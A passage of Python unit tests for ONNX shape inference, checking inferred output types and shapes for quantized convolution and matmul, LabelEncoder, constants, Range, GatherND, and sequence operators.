def test_convinteger(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (3, 4, 5, 6, 7)),
('y', TensorProto.UINT8, (5, 4, 2, 4, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (3, 5, 4, 1, 3))])
def test_convinetger_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 4, 2))])
def test_convinteger_strides(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 3, 2))])
def test_convineteger_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('y', TensorProto.INT8, (50, 4, 3, 3, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, 6, 6, 6))])
def test_convineteger_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('y', TensorProto.INT8, (4, 1, 8, 8, 8))],
[make_node('ConvInteger', ['x', 'y'], 'z', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 4, 1, 1, 1))])
def test_convineteger_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, None, 6, 4)),
('y', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('x_zero_point', TensorProto.UINT8, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('ConvInteger', ['x', 'y', 'x_zero_point', 'y_zero_point'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, (30, 50, None, 6, 6))]) # type: ignore
def test_convineteger_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('y', TensorProto.UINT8, (50, 4, None, 3, 3))],
[make_node('ConvInteger', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.INT32, None)])
def test_qlinearconv(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (3, 4, 5, 6, 7)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (5, 4, 2, 4, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (3, 5, 4, 1, 3))])
def test_qlinearconv_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, 6, 4, 2))])
def test_qlinearconv_strides(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.INT8, ()),
('w', TensorProto.INT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.INT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT8, (30, 50, 6, 3, 2))])
def test_qlinearconv_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.INT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, 6, 6, 6))])
def test_qlinearconv_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.INT8, (30, 4, 8, 8, 8)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.INT8, ()),
('w', TensorProto.INT8, (4, 1, 8, 8, 8)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.INT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.INT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT8, (30, 4, 1, 1, 1))])
def test_qlinearconv_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, None, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, 3, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 50, None, 6, 6))]) # type: ignore
def test_qlinearconv_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 7, 6, 4)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ()),
('w', TensorProto.UINT8, (50, 4, None, 3, 3)),
('w_scale', TensorProto.FLOAT, ()),
('w_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearConv', ['x', 'x_scale', 'x_zero_point', 'w', 'w_scale', 'w_zero_point', 'y_scale', 'y_zero_point'], 'y', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, None)])
def _make_qlinearmatmul_test(self, shape1, shape2): # type: (Sequence[int], Sequence[int]) -> None
expected_out_shape = np.matmul(np.arange(np.product(shape1)).reshape(shape1),
np.arange(np.product(shape2)).reshape(shape2)).shape
graph = self._make_graph(
[('a', TensorProto.UINT8, shape1),
('a_scale', TensorProto.FLOAT, ()),
('a_zero_point', TensorProto.UINT8, ()),
('b', TensorProto.UINT8, shape2),
('b_scale', TensorProto.FLOAT, ()),
('b_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearMatMul', ['a', 'a_scale', 'a_zero_point', 'b', 'b_scale', 'b_zero_point', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, expected_out_shape)])
def test_qlinearmatmul(self): # type: () -> None
self._make_qlinearmatmul_test((3,), (3,))
self._make_qlinearmatmul_test((4, 2), (2, 4))
self._make_qlinearmatmul_test((2,), (2, 3))
self._make_qlinearmatmul_test((4, 2), (2,))
self._make_qlinearmatmul_test((5, 1, 4, 2), (1, 3, 2, 3))
self._make_qlinearmatmul_test((4, 2), (3, 2, 3))
def _make_qlinearmatmul_test_allow_unknown(self, shape1, shape2, expected_out_shape): # type: (Any, Any, Any) -> None
graph = self._make_graph(
[('a', TensorProto.UINT8, shape1),
('a_scale', TensorProto.FLOAT, ()),
('a_zero_point', TensorProto.UINT8, ()),
('b', TensorProto.UINT8, shape2),
('b_scale', TensorProto.FLOAT, ()),
('b_zero_point', TensorProto.UINT8, ()),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QLinearMatMul', ['a', 'a_scale', 'a_zero_point', 'b', 'b_scale', 'b_zero_point', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, expected_out_shape)])
def test_qlinearmatmul_allow_unknown(self): # type: () -> None
self._make_qlinearmatmul_test_allow_unknown((None,), (None,), ())
self._make_qlinearmatmul_test_allow_unknown((3,), (None,), ())
self._make_qlinearmatmul_test_allow_unknown((2,), (2, "a"), ("a",))
self._make_qlinearmatmul_test_allow_unknown((4, 2), (2, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((4, None), (2, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((4, None), (None, "a"), (4, "a"))
self._make_qlinearmatmul_test_allow_unknown((1, 4, 2), ("a", 2, 5), ("a", 4, 5))
self._make_qlinearmatmul_test_allow_unknown((1, 3, 4, 2), ("a", 2, 5), (1, 3, 4, 5))
self._make_qlinearmatmul_test_allow_unknown(None, ("a", 2, 5), None)
self._make_qlinearmatmul_test_allow_unknown(None, None, None)
def _make_matmulinteger_test(self, shape1, shape2): # type: (Sequence[int], Sequence[int]) -> None
expected_out_shape = np.matmul(np.arange(np.product(shape1)).reshape(shape1),
np.arange(np.product(shape2)).reshape(shape2)).shape
graph = self._make_graph(
[('A', TensorProto.UINT8, shape1),
('B', TensorProto.UINT8, shape2),
('a_zero_point', TensorProto.UINT8, ()),
('b_zero_point', TensorProto.UINT8, ())],
[make_node('MatMulInteger', ['A', 'B', 'a_zero_point', 'b_zero_point'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.INT32, expected_out_shape)])
def test_matmulinteger(self): # type: () -> None
self._make_matmulinteger_test((2,), (2,))
self._make_matmulinteger_test((1, 2), (2, 3))
self._make_matmulinteger_test((2,), (2, 3))
self._make_matmulinteger_test((4, 2), (2,))
self._make_matmulinteger_test((5, 1, 4, 2), (1, 3, 2, 3))
self._make_matmulinteger_test((4, 2), (3, 2, 3))
def test_quantizelinear(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y_scale', TensorProto.FLOAT, ()),
('y_zero_point', TensorProto.UINT8, ())],
[make_node('QuantizeLinear', ['x', 'y_scale', 'y_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.UINT8, (30, 4, 5))])
def test_dequantizelinear(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT8, (30, 4, 5)),
('x_scale', TensorProto.FLOAT, ()),
('x_zero_point', TensorProto.UINT8, ())],
[make_node('DequantizeLinear', ['x', 'x_scale', 'x_zero_point'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (30, 4, 5))])
def test_reversesequence(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('sequence_lens', TensorProto.INT64, (5,))],
[make_node('ReverseSequence', ['x', 'sequence_lens'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 5, 6))])
def test_unique_without_axis(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (2, 4, 2))],
[make_node('Unique', ['X'], ['Y', 'indices', 'inverse_indices', 'counts'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (None,)), # type: ignore
make_tensor_value_info('indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('inverse_indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('counts', TensorProto.INT64, (None,))]) # type: ignore
def test_unique_with_axis(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (2, 4, 2))],
[make_node('Unique', ['X'], ['Y', 'indices', 'inverse_indices', 'counts'], axis=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (2, None, 2)), # type: ignore
make_tensor_value_info('indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('inverse_indices', TensorProto.INT64, (None,)), # type: ignore
make_tensor_value_info('counts', TensorProto.INT64, (None,))]) # type: ignore
def test_det(self): # type: () -> None
graph = self._make_graph(
[('X', TensorProto.FLOAT, (3, 3))],
[make_node('Det', ['X'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, ())])
graph = self._make_graph(
[('X', TensorProto.FLOAT, (4, 5, 6, 7, 7))],
[make_node('Det', ['X'], ['Y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('Y', TensorProto.FLOAT, (4, 5, 6))])
def test_tile(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[],
initializer=[make_tensor('repeats', TensorProto.INT64, (3,), (1, 2, 3))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 10, 18))])
def test_tile_raw_input_data(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[],
initializer=[make_tensor('repeats', TensorProto.INT64, (3,),
vals=np.array([1, 2, 3], dtype='<i8').tobytes(), raw=True)]) # Feed raw bytes (force little endian ordering like onnx standard) for test purpose
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 10, 18))])
def test_tile_rank_inference(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('repeats', TensorProto.INT64, (3,))],
[make_node('Tile', ['x', 'repeats'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (None, None, None))]) # type: ignore
def test_linearclassifier_1D_input(self): # type: () -> None
if ONNX_ML:
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5,))],
[make_node('LinearClassifier', ['x'], ['y', 'z'], domain=ONNX_ML_DOMAIN, coefficients=[0.0008, -0.0008], intercepts=[2.0, 2.0], classlabels_ints=[1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (1,)),
make_tensor_value_info('z', TensorProto.FLOAT, (1, 2))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 11)])
def test_linearclassifier_2D_input(self): # type: () -> None
if ONNX_ML:
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5))],
[make_node('LinearClassifier', ['x'], ['y', 'z'], domain=ONNX_ML_DOMAIN, coefficients=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6], intercepts=[2.0, 2.0, 3.0], classlabels_ints=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (4,)),
make_tensor_value_info('z', TensorProto.FLOAT, (4, 3))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 1), make_opsetid(ONNX_DOMAIN, 11)])
def test_roialign_symbolic(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, ('num_rois',))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'], output_height=10, output_width=5)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ('num_rois', 'C', 10, 5))]) # type: ignore
def test_roialign_symbolic_defaults(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, ('num_rois',))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ('num_rois', 'C', 1, 1))]) # type: ignore
def test_roialign_num_rois(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ('N', 'C', 'H', 'W')),
('rois', TensorProto.FLOAT, ('num_rois', 4)),
('batch_indices', TensorProto.INT64, (15,))],
[make_node('RoiAlign', ['x', 'rois', 'batch_indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (15, 'C', 1, 1))]) # type: ignore
def test_label_encoder_string_int64(self): # type: () -> None
if ONNX_ML:
string_list = ['A', 'm', 'y']
float_list = [94.17, 36.00]
int64_list = [12, 28, 86]
graph = self._make_graph(
[('x', TensorProto.STRING, (6, 1))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_strings=string_list, values_int64s=int64_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (6, 1))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.INT64, (2, 3))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_int64s=int64_list, values_strings=string_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, (2, 3))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2,))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_floats=float_list, values_int64s=int64_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (2,))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.INT64, (8,))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_int64s=int64_list, values_floats=float_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (8,))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.FLOAT, ())],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_floats=float_list, values_strings=string_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, ())],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
graph = self._make_graph(
[('x', TensorProto.STRING, (1, 2))],
[make_node('LabelEncoder', ['x'], ['y'], domain=ONNX_ML_DOMAIN,
keys_strings=string_list, values_floats=float_list)], [])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2))],
opset_imports=[make_opsetid(ONNX_ML_DOMAIN, 2), make_opsetid(ONNX_DOMAIN, 11)])
def make_sparse(self,
shape, # type: Sequence[int]
values, # type: Sequence[int]
indices_shape, # type: Sequence[int]
indices # type: Sequence[int]
): # type: (...) -> SparseTensorProto
sparse = SparseTensorProto()
sparse.dims.extend(shape)
nnz = len(values)
sparse.values.CopyFrom(helper.make_tensor('spval', TensorProto.INT64, (nnz,), values))
sparse.indices.CopyFrom(helper.make_tensor('spind', TensorProto.INT64, indices_shape, indices))
return sparse
def test_constant_sparse(self): # type: () -> None
y_shape = [100]
y_value = self.make_sparse(y_shape, [13, 17, 19], [3], [9, 27, 81])
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], sparse_value=y_value)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, y_shape)]) # type: ignore
def test_constant_value_int(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_int=42)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, [])])
def test_constant_value_ints(self): # type: () -> None
value_ints = [1, 2, 3]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_ints=value_ints)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, [len(value_ints)])])
def test_constant_value_float(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_float=1.42)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, [])])
def test_constant_value_floats(self): # type: () -> None
value_floats = [1.0, 1.1, 1.2]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_floats=value_floats)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, [len(value_floats)])])
def test_constant_value_string(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_string="String value")],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, [])])
def test_constant_value_strings(self): # type: () -> None
value_strings = ["o", "n", "n", "x"]
graph = self._make_graph(
[],
[make_node('Constant', [], ['y'], value_strings=value_strings)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.STRING, [len(value_strings)])])
def test_range(self): # type: () -> None
graph = self._make_graph(
[('start', TensorProto.FLOAT, ()),
('limit', TensorProto.FLOAT, ()),
('delta', TensorProto.FLOAT, ())],
[make_node('Range', ['start', 'limit', 'delta'], ['output'])],
[],
initializer=[make_tensor('start', TensorProto.FLOAT, (), (1,)),
make_tensor('limit', TensorProto.FLOAT, (), (5,)),
make_tensor('delta', TensorProto.FLOAT, (), (2,))])
self._assert_inferred(graph, [make_tensor_value_info('output', TensorProto.FLOAT, (2,))])
def test_range_rank_inference(self): # type: () -> None
graph = self._make_graph(
[('start', TensorProto.INT32, ()),
('limit', TensorProto.INT32, ()),
('delta', TensorProto.INT32, ())],
[make_node('Range', ['start', 'limit', 'delta'], ['output'])],
[],
initializer=[make_tensor('start', TensorProto.INT32, (), (1,)),
make_tensor('limit', TensorProto.INT32, (), (5,))]) # Missing 'delta' initializer
self._assert_inferred(graph, [make_tensor_value_info('output', TensorProto.INT32, (None,))]) # type: ignore
def test_gathernd(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (4, 5, 6)),
('indices', TensorProto.INT64, (2,))],
[make_node('GatherND', ['x', 'indices'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (6,))])
def test_gathernd_batchdim_1(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 2, 2)),
('indices', TensorProto.INT64, (2, 1))],
[make_node('GatherND', ['x', 'indices'], ['y'], batch_dims=1)],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))])
def test_cumsum(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (2, 3)),
('axis', TensorProto.FLOAT, (1,))],
[make_node('CumSum', ['x', 'axis'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (2, 3))])
def test_nonmaxsuppression(self): # type: () -> None
graph = self._make_graph(
[('boxes', TensorProto.FLOAT, (1, 3, 4)),
('scores', TensorProto.FLOAT, (1, 5, 3))],
[make_node('NonMaxSuppression', ['boxes', 'scores'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (None, 3))]) # type: ignore
def test_sequence_empty(self): # type: () -> None
graph = self._make_graph(
[],
[make_node('SequenceEmpty', [], ['output'])],
[])
self._assert_inferred(graph, [make_sequence_value_info('output', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_construct(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_construct_one_input(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_construct_diff_rank(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3)),
('input3', TensorProto.FLOAT, (2, 3))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_construct_diff_dim_size(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 5)),
('input3', TensorProto.FLOAT, (2, 3, 6))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['output_sequence'])],
[])
self._assert_inferred(graph,
[make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, None))]) # type: ignore
def test_sequence_insert(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('input4', TensorProto.FLOAT, (2, 3, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, 3, 4))]) # type: ignore
def test_sequence_insert_diff_rank(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('input4', TensorProto.FLOAT, (2, 3))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
make_sequence_value_info('output_sequence', TensorProto.FLOAT, None)]) # type: ignore
def test_sequence_insert_diff_shape(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 5, 4)),
('input4', TensorProto.FLOAT, (2, 5, 2))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceInsert', ['in_sequence', 'input4'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 4)), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, None))]) # type: ignore
def test_sequence_at(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 3, 4)),
('ind', TensorProto.INT64, ())],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('SequenceAt', ['in_sequence', 'ind'], ['output'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, 3, 4)),
